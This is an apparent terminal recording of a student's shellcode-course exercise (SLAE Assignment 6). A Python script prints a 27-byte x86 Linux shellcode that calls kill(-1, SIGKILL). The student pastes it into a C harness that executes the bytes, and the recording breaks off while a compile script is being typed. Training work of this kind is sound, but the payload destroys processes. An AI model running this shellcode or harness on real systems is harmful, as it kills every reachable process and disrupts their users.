{"version": 2, "width": 94, "height": 26, "timestamp": 1534524000, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.02886, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004h\u001b[c\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;26r\u001b]112\u0007\u001b[2;4H\u001b[?2004h\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                              \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.044123, "o", "\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;26r\u001b[2;4H\u001b[?2004h"]
[0.045393, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                              \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.134383, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                              \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.261128, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                              \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.266738, "o", "\u001b[?25l\u001b[26;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 28m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 16% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.855582, "o", "."]
[1.50096, "o", "\b./"]
[1.868257, "o", "k"]
[2.053238, "o", "i"]
[2.253634, "o", "l"]
[2.399084, "o", "l_"]
[2.782504, "o", "i"]
[2.900845, "o", "t_me_softly.py\u001b[1m \u001b(B\u001b[m"]
[3.57589, "o", "\b -"]
[3.949807, "o", "m"]
[4.326526, "o", "\r\n\u001b[?2004l"]
[4.400612, "o", "Shellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80"]
[4.401722, "o", "\r\n"]
[4.40247, "o", "Length:  27"]
[4.40313, "o", "\r\n"]
[4.406978, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                             \u001b[6;1H \r"]
[4.410915, "o", "\u001b[1;25r\u001b[7;25r\u001b[19S\u001b[6;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b[1;26r\u001b[6;60H\u001b(B\u001b[m"]
[4.41204, "o", "\r\n"]
[4.412217, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[4.412378, "o", "\u001b[K"]
[4.412694, "o", "\u001b[?2004h"]
[9.619047, "o", "v"]
[9.668691, "o", "\bvi"]
[9.857836, "o", "m"]
[9.904372, "o", " "]
[10.040541, "o", "s"]
[10.100692, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim s\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b"]
[10.101105, "o", "[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 16% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;9H\u001b[?12l\u001b[?25h"]
[10.153645, "o", "h"]
[10.184088, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim sh\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n"]
[10.18576, "o", "\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 16% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;10H\u001b[?12l\u001b[?25h"]
[10.320374, "o", "e"]
[10.440255, "o", "l"]
[10.578509, "o", "lcode"]
[10.912698, "o", "."]
[11.080701, "o", "c"]
[11.421929, "o", "\r\n\u001b[?2004l"]
[11.486312, "o", "\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[8d\u001b[?12l\u001b[?25h"]
[11.48901, "o", "\u001b[1;25r\u001b[2;25r\u001b[24S\u001b[1;1H\u001b[K\u001b[1;26r\u001b[1;1H"]
[11.500336, "o", "\u001b[25d\"shellcode.c\"\u001b[?25l"]
[11.50109, "o", " 19L, 247C"]
[11.512947, "o", "\u001b[H\u001b[34m/*\r\n * Put your assembler file here\r\n */\u001b[5;1H\u001b[35m#include\u001b[31m<stdio.h>\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[8;1H\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\r\n\u001b[31m\"\"\u001b[39m;\u001b[12;1H\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\r\n{\u001b[14;9Hprintf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[15;9H\u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[16;9Hret();\r\n}\u001b[20;1H\u001b[94m~                                                                                             \u001b[21;1H~                                                                                             \u001b[22;1H~                                                                                             \u001b[23;1H~                                                                                             \u001b[24;1H~                                                                                             \u001b[25;77H\u001b[39m9,3\u001b[11CAll\u001b[9;3H\u001b[?12l\u001b[?25h"]
[12.55651, "o", "\u001b]0;SLAE ❐ SLAE ● 1 vim\u0007\u001b[?25l\u001b[26;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 16% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;3H\u001b["]
[12.55753, "o", "?12l\u001b[?25h"]
[12.557933, "o", "\u001b[25;67H~@k\u001b[3D   \u001b[9C2\u001b[9;2H"]
[12.638965, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[31m\"\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret("]
[12.641762, "o", ");\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                             \u001b[21;1H~                                                                                             \u001b[22;1H~                                                                                             \u001b[23;1H~                                                                                             \u001b[24;1H~                                                                                             \u001b[25;1H\u001b[39m\"shellcode.c\" 19L, 247C                                                     9,2           All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 16% \u001b[38;5;245m| 18:40 | 1"]
[12.642, "o", "7 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;2H\u001b[?12l\u001b[?25h"]
[12.759374, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[31m\"\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret("]
[12.759686, "o", ");\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                             \u001b[21;1H~                                                                                             \u001b[22;1H~                                                                                             \u001b[23;1H~                                                                                             \u001b[24;1H~                                                                                             \u001b[25;1H\u001b[39m\"shellcode.c\" 19L, 247C                                                     9,2           All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 1"]
[12.759861, "o", "7 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;2H\u001b[?12l\u001b[?25h"]
[13.29072, "o", "\u001b[25;67Hi\b \r\u001b[1m-- INSERT --\u001b(B\u001b[m\u001b[K\u001b[64C9,2\u001b[11CAll\u001b[9;2H"]
[13.876846, "o", "\u001b[10;24r\u001b[10;1H\u001b[1L\u001b[9;2H\u001b[35m\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\\\\rxf2\\x4b\\xcd\\x80\u001b[31m\"\u001b[39m;\u001b[1;26r\u001b[10;18H\u001b[?25l"]
[13.877926, "o", "\u001b[25;77H\u001b[K9,110\u001b[9CAll\u001b[10;16H\u001b[?12l\u001b[?25h"]
[14.681007, "o", "\u001b[25;1H\u001b[K\u001b[66C^[\u001b[10;15H\u001b[?25l"]
[14.782125, "o", "\u001b[25;67H  \u001b[8C9,109\u001b[9CAll\u001b[10;15H\u001b[?12l\u001b[?25h"]
[14.874614, "o", "\u001b[25;67H:\b\u001b[K\r:"]
[15.139686, "o", "w"]
[15.210759, "o", "q"]
[15.603497, "o", "\r"]
[15.605413, "o", "\"shellcode.c\"\u001b[?25l"]
[15.612387, "o", " 19L, 355C written"]
[15.616229, "o", "\r"]
[15.616468, "o", "\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H"]
[15.616699, "o", "\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[8d\u001b[?12l\u001b[?25h"]
[15.622935, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                             \u001b[8;1H \r"]
[15.624507, "o", "\u001b[1;25r\u001b[9;25r\u001b[17S\u001b[8;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b[1;26r\u001b[8;60H\u001b(B\u001b[m"]
[15.624697, "o", "\r\n"]
[15.62486, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[15.625019, "o", "\u001b[K"]
[15.625455, "o", "\u001b[?2004h"]
[16.606133, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[26;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;4H\u001b["]
[16.606432, "o", "?12l\u001b[?25h"]
[16.606695, "o", "."]
[16.710321, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[16.710649, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m.\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;5H\u001b[?12l\u001b[?25h"]
[16.749313, "o", "\b.."]
[16.818613, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[16.818899, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m..\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;6H\u001b[?12l\u001b[?25h"]
[17.07641, "o", "/"]
[17.389495, "o", "."]
[17.531795, "o", "."]
[17.764052, "o", "/"]
[18.172418, "o", "b"]
[18.269193, "o", "i"]
[18.461054, "o", "n"]
[18.836711, "o", "/"]
[19.221985, "o", "c"]
[19.302009, "o", "o"]
[19.485048, "o", "m"]
[19.692942, "o", "p"]
[19.861591, "o", "i"]
[19.982835, "o", "le.sh\u001b[1m \u001b(B\u001b[m"]
[20.081031, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
